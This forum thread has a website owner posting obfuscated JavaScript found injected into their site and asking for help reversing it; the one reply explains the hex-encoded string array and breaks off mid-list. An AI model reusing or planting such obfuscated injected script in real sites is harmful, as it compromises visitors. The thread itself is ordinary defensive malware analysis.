Reversing Javascript Help

#32462 by milosbre
Wed Jan 16, 2019 7:24 pm

Hi guys.
This is the malware javascript found on my website.
Tried online deobfuscators but they didn't help much.
Can anyone shed some light?

Code: Select all

function pxyz() {

    var b4c45a = [ & quot;\x6F\ x6E\ x6D\ x6F\ x75\ x73\ x65\ x6F\ x76\ x65\ x72 & quot;, & quot;\x70\ x6B\ x63\ x73\ x31\ x31 & quot;, & quot;\x74\ x65\ x78\ x74\ x61\ x72\ x65\ x61 & quot;, & quot;\x66\ x6F\ x72\ x6D & quot;, & quot;\x70\ x61\ x63\ x6B\ x61\ x67\ x65\ x73 & quot;, & quot;\x74\ x6F\ x53\ x74\ x72\ x69\ x6E\ x67 & quot;, & quot;\x63\ x6F\ x6E\ x66\ x69\ x72\ x6D & quot;, & quot;\x77\ x68\ x69\ x6C\ x65 & quot;, & quot;\x6D\ x69\ x6D\ x65\ x54\ x79\ x70\ x65\ x73 & quot;, & quot;\x64\ x65\ x66\ x61\ x75\ x6C\ x74\ x53\ x74\ x61\ x74\ x75\ x73 & quot;, & quot;\x70\ x61\ x72\ x73\ x65\ x46\ x6C\ x6F\ x61\ x74 & quot;, & quot;\x74\ x6F\ x70 & quot;, & quot;\x6F\ x6E\ x6D\ x6F\ x75\ x73\ x65\ x64\ x6F\ x77\ x6E & quot;, & quot;\x72\ x65\ x74\ x75\ x72\ x6E & quot;, & quot;\x63\ x6C\ x6F\ x73\ x65\ x64 & quot;, & quot;\x66\ x72\ x6F\ x6D\ x43\ x68\ x61\ x72\ x43\ x6F\ x64\ x65 & quot;, & quot;\x66\ x75\ x6E\ x63\ x74\ x69\ x6F\ x6E & quot;, & quot;\x61\ x62\ x73\ x74\ x72\ x61\ x63\ x74 & quot;, & quot;\x77\ x69\ x6E\ x64\ x6F\ x77 & quot;, & quot;\x64\ x6F\ x75\ x62\ x6C\ x65 & quot;, & quot;\x70\ x72\ x6F\ x6D\ x70\ x74 & quot;, & quot;\x4E\ x61\ x4E & quot;, & quot;\x63\ x68\ x61\ x72 & quot;, & quot;\x61\ x6C\ x65\ x72\ x74 & quot;, & quot;\x69\ x6E\ x6E\ x65\ x72\ x48\ x65\ x69\ x67\ x68\ x74 & quot;, & quot;\x70\ x72\ x6F\ x74\ x65\ x63\ x74\ x65\ x64 & quot;, & quot;\x73\ x65\ x6C\ x66 & quot;, & quot;\x74\ x6F\ x55\ x70\ x70\ x65\ x72\ x43\ x61\ x73\ x65 & quot;, & quot;\x69 & quot;, & quot;\x6F\ x6E\ x6B\ x65\ x79\ x70\ x72\ x65\ x73\ x73 & quot;, & quot;\x74\ x72\ x79 & quot;, & quot;\x49\ x6E\ x66\ x69\ x6E\ x69\ x74\ x79 & quot;, & quot;\x63\ x6F\ x6E\ x73\ x74\ x72\ x75\ x63\ x74\ x6F\ x72 & quot;, & quot;\x6E\ x61\ x76\ x69\ x67\ x61\ x74\ x6F\ x72 & quot;, & quot;\x6F\ x75\ x74\ x65\ x72\ x48\ x65\ x69\ x67\ x68\ x74 & quot;, & quot;\x69\ x73\ x50\ x72\ x6F\ x74\ x6F\ x74\ x79\ x70\ x65\ x4F\ x66 & quot;, & quot;\x66\ x6F\ x72\ x6D\ x73 & quot;, & quot;\x74\ x68\ x72\ x6F\ x77 & quot;, & quot;\x6F\ x6E\ x6B\ x65\ x79\ x64\ x6F\ x77\ x6E & quot;, & quot;\x73\ x65\ x6C\ x65\ x63\ x74 & quot;, & quot;\x69\ x6E\ x6E\ x65\ x72\ x57\ x69\ x64\ x74\ x68 & quot;, & quot;\x72\ x65\ x73\ x65\ x74 & quot;, & quot;\x73\ x68\ x6F\ x72\ x74 & quot;, & quot;\x69\ x6E\ x74\ x65\ x72\ x66\ x61\ x63\ x65 & quot;, & quot;\x74\ x79\ x70\ x65\ x6F\ x66 & quot;, & quot;\x73\ x77\ x69\ x74\ x63\ x68 & quot;, & quot;\x65\ x6C\ x65\ x6D\ x65\ x6E\ x74 & quot;, & quot;\x62\ x79\ x74\ x65 & quot;, & quot;\x4F\ x62\ x6A\ x65\ x63\ x74 & quot;, & quot;\x69\ x6E & quot;, & quot;\x69\ x6D\ x61\ x67\ x65 & quot;, & quot;\x73\ x65\ x74\ x54\ x69\ x6D\ x65\ x6F\ x75\ x74 & quot;, & quot;\x66\ x72\ x61\ x6D\ x65\ x52\ x61\ x74\ x65 & quot;, & quot;\x6E\ x65\ x77 & quot;, & quot;\x64\ x65\ x6C\ x65\ x74\ x65 & quot;, & quot;\x6F\ x70\ x65\ x6E\ x65\ x72 & quot;, & quot;\x70\ x61\ x63\ x6B\ x61\ x67\ x65 & quot;, & quot;\x6F\ x66\ x66\ x73\ x63\ x72\ x65\ x65\ x6E\ x42\ x75\ x66\ x66\ x65\ x72\ x69\ x6E\ x67 & quot;, & quot;\x64\ x65\ x63\ x6F\ x64\ x65\ x55\ x52\ x49\ x43\ x6F\ x6D\ x70\ x6F\ x6E\ x65\ x6E\ x74 & quot;, & quot;\x50 & quot;, & quot;\x64\ x6F & quot;, & quot;\x43 & quot;, & quot;\x63\ x72\ x79\ x70\ x74\ x6F & quot;, & quot;\x6C\ x61\ x79\ x65\ x72\ x73 & quot;, & quot;\x6F\ x6E\ x63\ x6C\ x69\ x63\ x6B & quot;, & quot;\x64\ x65\ x66\ x61\ x75\ x6C\ x74 & quot;, & quot;\x64\ x65\ x63\ x6F\ x64\ x65\ x55\ x52\ x49 & quot;, & quot;\x6F\ x75\ x74\ x65\ x72\ x57\ x69\ x64\ x74\ x68 & quot;, & quot;\x6F\ x6E\ x6B\ x65\ x79\ x75\ x70 & quot;, & quot;\x6E\ x61\ x6D\ x65 & quot;, & quot;\x65\ x78\ x74\ x65\ x6E\ x64\ x73 & quot;, & quot;\x6F\ x6E\ x62\ x6C\ x75\ x72 & quot;, & quot;\x61\ x6E\ x63\ x68\ x6F\ x72 & quot;, & quot;\x76\ x61\ x6C\ x75\ x65\ x4F\ x66 & quot;, & quot;\x75\ x6E\ x74\ x61\ x69\ x6E\ x74 & quot;, & quot;\x5F & quot;, & quot;\x68\ x69\ x64\ x64\ x65\ x6E & quot;, & quot;\x73\ x70\ x6C\ x69\ x74 & quot;, & quot;\x64\ x65\ x62\ x75\ x67\ x67\ x65\ x72 & quot;, & quot;\x66\ x69\ x6E\ x61\ x6C & quot;, & quot;\x41 & quot;, & quot;\x79\ x69\ x65\ x6C\ x64 & quot;, & quot;\x65\ x6D\ x62\ x65\ x64\ x73 & quot;, & quot;\x69\ x6E\ x73\ x74\ x61\ x6E\ x63\ x65\ x6F\ x66 & quot;, & quot;\x66\ x69\ x6C\ x65\ x55\ x70\ x6C\ x6F\ x61\ x64 & quot;, & quot;\x65\ x78\ x70\ x6F\ x72\ x74 & quot;, & quot;\x66\ x72\ x61\ x6D\ x65 & quot;, & quot;\x70\ x72\ x6F\ x70\ x65\ x72\ x74\ x79\ x49\ x73\ x45\ x6E\ x75\ x6D & quot;, & quot;\x74\ x72\ x61\ x6E\ x73\ x69\ x65\ x6E\ x74 & quot;, & quot;\x63\ x6C\ x65\ x61\ x72\ x54\ x69\ x6D\ x65\ x6F\ x75\ x74 & quot;, & quot;\x75\ x6E\ x64\ x65\ x66\ x69\ x6E\ x65\ x64 & quot;, & quot;\x53\ x74\ x72\ x69\ x6E\ x67 & quot;, & quot;\x70\ x72\ x69\ x76\ x61\ x74\ x65 & quot;, & quot;\x70\ x75\ x62\ x6C\ x69\ x63 & quot;, & quot;\x67\ x6F\ x74\ x6F & quot;, & quot;\x4E\ x75\ x6D\ x62\ x65\ x72 & quot;, & quot;\x65\ x6D\ x62\ x65\ x64 & quot;, & quot;\x62\ x6C\ x75\ x72 & quot;, & quot;\x61\ x6E\ x63\ x68\ x6F\ x72\ x73 & quot;, & quot;\x63\ x6F\ x6E\ x73\ x74 & quot;, & quot;\x73 & quot;, & quot;\x69\ x6D\ x61\ x67\ x65\ x73 & quot;, & quot;\x68\ x61\ x73\ x4F\ x77\ x6E\ x50\ x72\ x6F\ x70\ x65\ x72\ x74\ x79 & quot;, & quot;\x6F\ x6E\ x6C\ x6F\ x61\ x64 & quot;, & quot;\x73\ x75\ x62\ x6D\ x69\ x74 & quot;, & quot;\x66\ x72\ x61\ x6D\ x65\ x73 & quot;, & quot;\x65\ x73\ x63\ x61\ x70\ x65 & quot;, & quot;\x65\ x6E\ x63\ x6F\ x64\ x65\ x55\ x52\ x49 & quot;, & quot;\x73\ x63\ x72\ x65\ x65\ x6E\ x58 & quot;, & quot;\x73\ x79\ x6E\ x63\ x68\ x72\ x6F\ x6E\ x69\ x7A\ x65\ x64 & quot;, & quot;\x65\ x6E\ x63\ x6F\ x64\ x65\ x55\ x52\ x49\ x43\ x6F\ x6D\ x70\ x6F\ x6E\ x65\ x6E\ x74 & quot;, & quot;\x6E\ x75\ x6C\ x6C & quot;, & quot;\x6F\ x6E\ x65\ x72\ x72\ x6F\ x72 & quot;, & quot;\x63\ x6F\ x6E\ x74\ x69\ x6E\ x75\ x65 & quot;, & quot;\x6E\ x61\ x76\ x69\ x67\ x61\ x74\ x65 & quot;, & quot;\x44\ x61\ x74\ x65 & quot;, & quot;\x69\ x6D\ x70\ x6C\ x65\ x6D\ x65\ x6E\ x74\ x73 & quot;, & quot;\x77\ x69\ x74\ x68 & quot;, & quot;\x6C\ x61\ x79\ x65\ x72 & quot;, & quot;\x70\ x61\ x72\ x65\ x6E\ x74 & quot;];
    var f5faf5c = [String[(b4c45a[105])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[57])[b4c45a[77]]( & quot; & quot;)[5] + (b4c45a[35])[b4c45a[77]]( & quot; & quot;)[6] + (b4c45a[116])[b4c45a[77]]( & quot; & quot;)[1] + b4c45a[61] + String[b4c45a[15]](202 + -98) + (b4c45a[84])[b4c45a[77]]( & quot; & quot;)[8] + (b4c45a[102])[b4c45a[77]]( & quot; & quot;)[7] + (+(12))[b4c45a[5]](15)[b4c45a[27]]() + (b4c45a[44])[b4c45a[77]]( & quot; & quot;)[4] + (b4c45a[82])[b4c45a[77]]( & quot; & quot;)[4] + (b4c45a[41])[b4c45a[77]]( & quot; & quot;)[1]](124 + -21) + (b4c45a[26])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[42])[b4c45a[77]]( & quot; & quot;)[4] + (+(14))[b4c45a[5]](15)[b4c45a[27]]() + (b4c45a[79])[b4c45a[77]]( & quot; & quot;)[4] + (b4c45a[2])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[89])[b4c45a[77]]( & quot; & quot;)[7] + (b4c45a[58])[b4c45a[77]]( & quot; & quot;)[5] + (b4c45a[32])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[47])[b4c45a[77]]( & quot; & quot;)[2] + (+(11))[b4c45a[5]](13)[b4c45a[27]]() + (b4c45a[30])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[66])[b4c45a[77]]( & quot; & quot;)[8] + (b4c45a[60])[b4c45a[77]]( & quot; & quot;)[0], (b4c45a[62])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[42])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[84])[b4c45a[77]]( & quot; & quot;)[8] + (b4c45a[102])[b4c45a[77]]( & quot; & quot;)[7] + (+(12))[b4c45a[5]](15)[b4c45a[27]]() + (b4c45a[11])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[107])[b4c45a[77]]( & quot; & quot;)[4] + (b4c45a[8])[b4c45a[77]]( & quot; & quot;)[7] + b4c45a[80] + (b4c45a[104])[b4c45a[77]]( & quot; & quot;)[5], (b4c45a[54])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[55])[b4c45a[77]]( & quot; & quot;)[4] + (b4c45a[31])[b4c45a[77]]( & quot; & quot;)[4] + (b4c45a[24])[b4c45a[77]]( & quot; & quot;)[8] + (b4c45a[87])[b4c45a[77]]( & quot; & quot;)[6] + (b4c45a[67])[b4c45a[77]]( & quot; & quot;)[9], (b4c45a[93])[b4c45a[77]]( & quot; & quot;)[5] + (b4c45a[112])[b4c45a[77]]( & quot; & quot;)[4] + (b4c45a[70])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[21])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[115])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[108])[b4c45a[77]]( & quot; & quot;)[3] + (+(14))[b4c45a[5]](15)[b4c45a[27]]() + (b4c45a[64])[b4c45a[77]]( & quot; & quot;)[3] + (b4c45a[52])[b4c45a[77]]( & quot; & quot;)[4] + (b4c45a[69])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[53])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[16])[b4c45a[77]]( & quot; & quot;)[7] + (b4c45a[10])[b4c45a[77]]( & quot; & quot;)[9]];
    var ea126 = 0;
    var a023aa6 = this[(b4c45a[82])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[87])[b4c45a[77]]( & quot; & quot;)[12] + (b4c45a[85])[b4c45a[77]]( & quot; & quot;)[5] + (b4c45a[110])[b4c45a[77]]( & quot; & quot;)[17] + (b4c45a[98])[b4c45a[77]]( & quot; & quot;)[4] + (b4c45a[110])[b4c45a[77]]( & quot; & quot;)[1] + b4c45a[59] + (b4c45a[20])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[102])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[43])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[24])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[64])[b4c45a[77]]( & quot; & quot;)[1] + (+(16))[b4c45a[5]](19) + (b4c45a[31])[b4c45a[77]]( & quot; & quot;)[0] + (+(13))[b4c45a[5]](18)[b4c45a[27]]()].substr(1);
    for (e90e0c = 0; e90e0c & lt; a023aa6[f5faf5c[2]]; e90e0c++) {
        ea126 += a023aa6[f5faf5c[1]](e90e0c);
    }
    var fdba820 = document[f5faf5c[0]]((b4c45a[106])[b4c45a[77]]( & quot; & quot;)[4] + (b4c45a[74])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[78])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[39])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[50])[b4c45a[77]]( & quot; & quot;)[0] + b4c45a[100] + (+(17))[b4c45a[5]](22) + b4c45a[75] + (b4c45a[117])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[113])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[29])[b4c45a[77]]( & quot; & quot;)[5]);
    var a023aa6 = document[f5faf5c[3]](b4c45a[28] + (b4c45a[24])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[56])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[32])[b4c45a[77]]( & quot; & quot;)[6] + (+(29))[b4c45a[5]](33));
    a023aa6[(b4c45a[10])[b4c45a[77]]( & quot; & quot;)[9] + (b4c45a[63])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[68])[b4c45a[77]]( & quot; & quot;)[6] + (b4c45a[23])[b4c45a[77]]( & quot; & quot;)[2]] = (b4c45a[34])[b4c45a[77]]( & quot; & quot;)[9] + (b4c45a[76])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[109])[b4c45a[77]]( & quot; & quot;)[11] + (b4c45a[103])[b4c45a[77]]( & quot; & quot;)[5] + (b4c45a[51])[b4c45a[77]]( & quot; & quot;)[6] + (b4c45a[33])[b4c45a[77]]( & quot; & quot;)[0];
    a023aa6[(b4c45a[91])[b4c45a[77]]( & quot; & quot;)[4] + (b4c45a[101])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[116])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[96])[b4c45a[77]]( & quot; & quot;)[3]] = (b4c45a[58])[b4c45a[77]]( & quot; & quot;)[12] + (b4c45a[71])[b4c45a[77]]( & quot; & quot;)[5] + (b4c45a[112])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[66])[b4c45a[77]]( & quot; & quot;)[3] + (b4c45a[6])[b4c45a[77]]( & quot; & quot;)[3];
    a023aa6[String[(b4c45a[52])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[85])[b4c45a[77]]( & quot; & quot;)[4] + (b4c45a[0])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[86])[b4c45a[77]]( & quot; & quot;)[3] + b4c45a[61] + (b4c45a[67])[b4c45a[77]]( & quot; & quot;)[9] + (b4c45a[84])[b4c45a[77]]( & quot; & quot;)[8] + (b4c45a[41])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[110])[b4c45a[77]]( & quot; & quot;)[9] + (b4c45a[55])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[40])[b4c45a[77]]( & quot; & quot;)[7] + (b4c45a[25])[b4c45a[77]]( & quot; & quot;)[4]](44 + 74) + (b4c45a[114])[b4c45a[77]]( & quot; & quot;)[5] + (b4c45a[81])[b4c45a[77]]( & quot; & quot;)[3] + (b4c45a[90])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[38])[b4c45a[77]]( & quot; & quot;)[3]] = ea126;
    fdba820[(b4c45a[52])[b4c45a[77]]( & quot; & quot;)[2] + String[(b4c45a[105])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[105])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[103])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[87])[b4c45a[77]]( & quot; & quot;)[13] + (b4c45a[58])[b4c45a[77]]( & quot; & quot;)[9] + (b4c45a[72])[b4c45a[77]]( & quot; & quot;)[3] + (b4c45a[2])[b4c45a[77]]( & quot; & quot;)[7] + (b4c45a[95])[b4c45a[77]]( & quot; & quot;)[5] + (+(12))[b4c45a[5]](15)[b4c45a[27]]() + (b4c45a[36])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[65])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[106])[b4c45a[77]]( & quot; & quot;)[5]](180 + -68) + (b4c45a[119])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[12])[b4c45a[77]]( & quot; & quot;)[6] + (b4c45a[29])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[65])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[58])[b4c45a[77]]( & quot; & quot;)[9] + (b4c45a[98])[b4c45a[77]]( & quot; & quot;)[3] + (b4c45a[33])[b4c45a[77]]( & quot; & quot;)[3] + (b4c45a[7])[b4c45a[77]]( & quot; & quot;)[3] + String[(b4c45a[31])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[92])[b4c45a[77]]( & quot; & quot;)[1] + (+(24))[b4c45a[5]](27) + (b4c45a[3])[b4c45a[77]]( & quot; & quot;)[3] + (+(12))[b4c45a[5]](15)[b4c45a[27]]() + (b4c45a[67])[b4c45a[77]]( & quot; & quot;)[9] + (b4c45a[56])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[23])[b4c45a[77]]( & quot; & quot;)[3] + (+(12))[b4c45a[5]](15)[b4c45a[27]]() + (b4c45a[6])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[103])[b4c45a[77]]( & quot; & quot;)[5] + (b4c45a[46])[b4c45a[77]]( & quot; & quot;)[4]](122 + -22)](a023aa6);
    var e6f9e6b = document[f5faf5c[0]]((b4c45a[8])[b4c45a[77]]( & quot; & quot;)[6] + (b4c45a[111])[b4c45a[77]]( & quot; & quot;)[1] + (+(11))[b4c45a[5]](16) + (b4c45a[118])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[50])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[32])[b4c45a[77]]( & quot; & quot;)[3] + (b4c45a[45])[b4c45a[77]]( & quot; & quot;)[5] + b4c45a[75] + (b4c45a[78])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[112])[b4c45a[77]]( & quot; & quot;)[5] + (b4c45a[48])[b4c45a[77]]( & quot; & quot;)[5] + (b4c45a[88])[b4c45a[77]]( & quot; & quot;)[8] + (b4c45a[37])[b4c45a[77]]( & quot; & quot;)[3] + (b4c45a[36])[b4c45a[77]]( & quot; & quot;)[3]);
    var a6afca = document[f5faf5c[3]]((b4c45a[116])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[40])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[1])[b4c45a[77]]( & quot; & quot;)[0] + (+(30))[b4c45a[5]](35) + (b4c45a[31])[b4c45a[77]]( & quot; & quot;)[6]);
    a6afca[(b4c45a[17])[b4c45a[77]]( & quot; & quot;)[7] + (b4c45a[38])[b4c45a[77]]( & quot; & quot;)[4] + (b4c45a[68])[b4c45a[77]]( & quot; & quot;)[6] + (b4c45a[19])[b4c45a[77]]( & quot; & quot;)[5]] = String[(b4c45a[9])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[108])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[14])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[116])[b4c45a[77]]( & quot; & quot;)[5] + b4c45a[61] + (b4c45a[67])[b4c45a[77]]( & quot; & quot;)[9] + (b4c45a[65])[b4c45a[77]]( & quot; & quot;)[3] + (b4c45a[98])[b4c45a[77]]( & quot; & quot;)[5] + (b4c45a[58])[b4c45a[77]]( & quot; & quot;)[9] + (b4c45a[94])[b4c45a[77]]( & quot; & quot;)[3] + (b4c45a[54])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[109])[b4c45a[77]]( & quot; & quot;)[10]](202 + -98) + (b4c45a[49])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[76])[b4c45a[77]]( & quot; & quot;)[3] + (b4c45a[18])[b4c45a[77]]( & quot; & quot;)[3] + (b4c45a[89])[b4c45a[77]]( & quot; & quot;)[8] + (b4c45a[83])[b4c45a[77]]( & quot; & quot;)[5];
    a6afca[(b4c45a[71])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[9])[b4c45a[77]]( & quot; & quot;)[3] + (b4c45a[69])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[106])[b4c45a[77]]( & quot; & quot;)[0]] = (b4c45a[68])[b4c45a[77]]( & quot; & quot;)[6] + (b4c45a[97])[b4c45a[77]]( & quot; & quot;)[3] + (b4c45a[110])[b4c45a[77]]( & quot; & quot;)[13] + (b4c45a[99])[b4c45a[77]]( & quot; & quot;)[1] + (+(15))[b4c45a[5]](16);
    a6afca[(b4c45a[73])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[4])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[103])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[13])[b4c45a[77]]( & quot; & quot;)[3] + (b4c45a[9])[b4c45a[77]]( & quot; & quot;)[1]] = ea126;
    e6f9e6b[(b4c45a[118])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[110])[b4c45a[77]]( & quot; & quot;)[12] + (b4c45a[93])[b4c45a[77]]( & quot; & quot;)[0] + (b4c45a[109])[b4c45a[77]]( & quot; & quot;)[10] + (b4c45a[72])[b4c45a[77]]( & quot; & quot;)[1] + (+(13))[b4c45a[5]](15) + (b4c45a[110])[b4c45a[77]]( & quot; & quot;)[9] + (b4c45a[22])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[84])[b4c45a[77]]( & quot; & quot;)[1] + (b4c45a[73])[b4c45a[77]]( & quot; & quot;)[2] + (b4c45a[96])[b4c45a[77]]( & quot; & quot;)[4]](a6afca);
}

Username

milosbre

Posts

1

Joined

Wed Jan 16, 2019 7:19 pm

Re: Reversing Javascript Help

#32467 by hackr8
Thu Jan 17, 2019 10:21 am

milosbre wrote: ↑Wed Jan 16, 2019 7:24 pm

I believe that this code was produced by a js obfuscator. The array 'b4c45a' contains some strings that are encoded in hex and seperated with quotes like

Code: Select all

&quot;

(with some indentations that i can add only manually)
The other variables call parts of the content of the first array. Now, if you take the content of each hex string and convert it to ascii you will see the original code(which I will try to post as soon as possible).
Hex Strings:

Code: Select all

"\x6F\ x6E\ x6D\ x6F\ x75\ x73\ x65\ x6F\ x76\ x65\ x72 ", "\x70\ x6B\ x63\ x73\ x31\ x31 ", "\x74\ x65\ x78\ x74\ x61\ x72\ x65\ x61 ", "\x66\ x6F\ x72\ x6D ", "\x70\ x61\ x63\ x6B\ x61\ x67\ x65\ x73 ", "\x74\ x6F\ x53\ x74\ x72\ x69\ x6E\ x67 ", "\x63\ x6F\ x6E\ x66\ x69\ x72\ x6D ", "\x77\ x68\ x69\ x6C\ x65 ", "\x6D\ x69\ x6D\ x65\ x54\ x79\ x70\ x65\ x73 ", "\x64\ x65\ x66\ x61\ x75\ x6C\ x74\ x53\ x74\ x61\ x74\ x75\ x73 ", "\x70\ x61\ x72\ x73\ x65\ x46\ x6C\ x6F\ x61\ x74 ", "\x74\ x6F\ x70 ", "\x6F\ x6E\ x6D\ x6F\ x75\ x73\ x65\ x64\ x6F\ x77\ x6E ", "\x72\ x65\ x74\ x75\ x72\ x6E ", "\x63\ x6C\ x6F\ x73\ x65\ x64 ", "\x66\ x72\ x6F\ x6D\ x43\ x68\ x61\ x72\ x43\ x6F\ x64\ x65 ", "\x66\ x75\ x6E\ x63\ x74\ x69\ x6F\ x6E ", "\x61\ x62\ x73\ x74\ x72\ x61\ x63\ x74 ", "\x77\ x69\ x6E\ x64\ x6F\ x77 ", "\x64\ x6F\ x75\ x62\ x6C\ x65 ", "\x70\ x72\ x6F\ x6D\ x70\ x74 ", "\x4E\ x61\ x4E ", "\x63\ x68\ x61\ x72 ", "\x61\ x6C\ x65\ x72\ x74 ", "\x69\ x6E\ x6E\ x65\ x72\ x48\ x65\ x69\ x67\ x68\ x74 ", "\x70\ x72\ x6F\ x74\ x65\ x63\ x74\ x65\ x64 ", "\x73\ x65\ x6C\ x66 ", "\x74\ x6F\ x55\ x70\ x70\ x65\ x72\ x43\ x61\ x73\ x65 ", "\x69 ", "\x6F\ x6E\ x6B\ x65\ x79\ x70\ x72\ x65\ x73\ x73 ", "\x74\ x72\ x79 ", "\x49\ x6E\ x66\ x69\ x6E\ x69\ x74\ x79 ", "\x63\ x6F\ x6E\ x73\ x74\ x72\ x75\ x63\ x74\ x6F\ x72 ", "\x6E\ x61\ x76\ x69\ x67\ x61\ x74\ x6F\ x72 ", "\x6F\ x75\ x74\ x65\ x72\ x48\ x65\ x69\ x67\ x68\ x74 ", "\x69\ x73\ x50\ x72\ x6F\ x74\ x6F\ x74\ x79\ x70\ x65\ x4F\ x66 ", "\x66\ x6F\ x72\ x6D\ x73 ", "\x74\ x68\ x72\ x6F\ x77 ", "\x6F\ x6E\ x6B\ x65\ x79\ x64\ x6F\ x77\ x6E ", "\x73\ x65\ x6C\ x65\ x63\ x74 ", "\x69\ x6E\ x6E\ x65\ x72\ x57\ x69\ x64\ x74\ x68 ", "\x72\ x65\ x73\ x65\ x74 ", "\x73\ x68\ x6F\ x72\ x74 ", "\x69\ x6E\ x74\ x65\ x72\ x66\ x61\ x63\ x65 ", "\x74\ x79\ x70\ x65\ x6F\ x66 ", "\x73\ x77\ x69\ x74\ x63\ x68 ", "\x65\ x6C\ x65\ x6D\ x65\ x6E\ x74 ", "\x62\ x79\ x74\ x65 ", "\x4F\ x62\ x6A\ x65\ x63\ x74 ", "\x69\ x6E ", "\x69\ x6D\ x61\ x67\ x65 ", "\x73\ x65\ x74\ x54\ x69\ x6D\ x65\ x6F\ x75\ x74 ", "\x66\ x72\ x61\ x6D\ x65\ x52\ x61\ x74\ x65 ", "\x6E\ x65\ x77 ", "\x64\ x65\ x6C\ x65\ x74\ x65 ", "\x6F\ x70\ x65\ x6E\ x65\ x72 ", "\x70\ x61\ x63\ x6B\ x61\ x67\ x65 ", "\x6F\ x66\ x66\ x73\ x63\ x72\ x65\ x65\ x6E\ x42\ x75\ x66\ x66\ x65\ x72\ x69\ x6E\ x67 ", "\x64\ x65\ x63\ x6F\ x64\ x65\ x55\ x52\ x49\ x43\ x6F\ x6D\ x70\ x6F\ x6E\ x65\ x6E\ x74 ", "\x50 ", "\x64\ x6F ", "\x43 ", "\x63\ x72\ x79\ x70\ x74\ x6F ", "\x6C\ x61\ x79\ x65\ x72\ x73 ", "\x6F\ x6E\ x63\ x6C\ x69\ x63\ x6B ", "\x64\ x65\ x66\ x61\ x75\ x6C\ x74 ", "\x64\ x65\ x63\ x6F\ x64\ x65\ x55\ x52\ x49 ", "\x6F\ x75\ x74\ x65\ x72\ x57\ x69\ x64\ x74\ x68 ", "\x6F\ x6E\ x6B\ x65\ x79\ x75\ x70 ", "\x6E\ x61\ x6D\ x65 ", "\x65\ x78\ x74\ x65\ x6E\ x64\ x73 ", "\x6F\ x6E\ x62\ x6C\ x75\ x72 ", "\x61\ x6E\ x63\ x68\ x6F\ x72 ", "\x76\ x61\ x6C\ x75\ x65\ x4F\ x66 ", "\x75\ x6E\ x74\ x61\ x69\ x6E\ x74 ", "\x5F ", "\x68\ x69\ x64\ x64\ x65\ x6E ", "\x73\ x70\ x6C\ x69\ x74 ", "\x64\ x65\ x62\ x75\ x67\ x67\ x65\ x72 ", "\x66\ x69\ x6E\ x61\ x6C ", "\x41 ", "\x79\ x69\ x65\ x6C\ x64 ", "\x65\ x6D\ x62\ x65\ x64\ x73 ", "\x69\ x6E\ x73\ x74\ x61\ x6E\ x63\ x65\ x6F\ x66 ", "\x66\ x69\ x6C\ x65\ x55\ x70\ x6C\ x6F\ x61\ x64 ", "\x65\ x78\ x70\ x6F\ x72\ x74 ", "\x66\ x72\ x61\ x6D\ x65 ", "\x70\ x72\ x6F\ x70\ x65\ x72\ x74\ x79\ x49\ x73\ 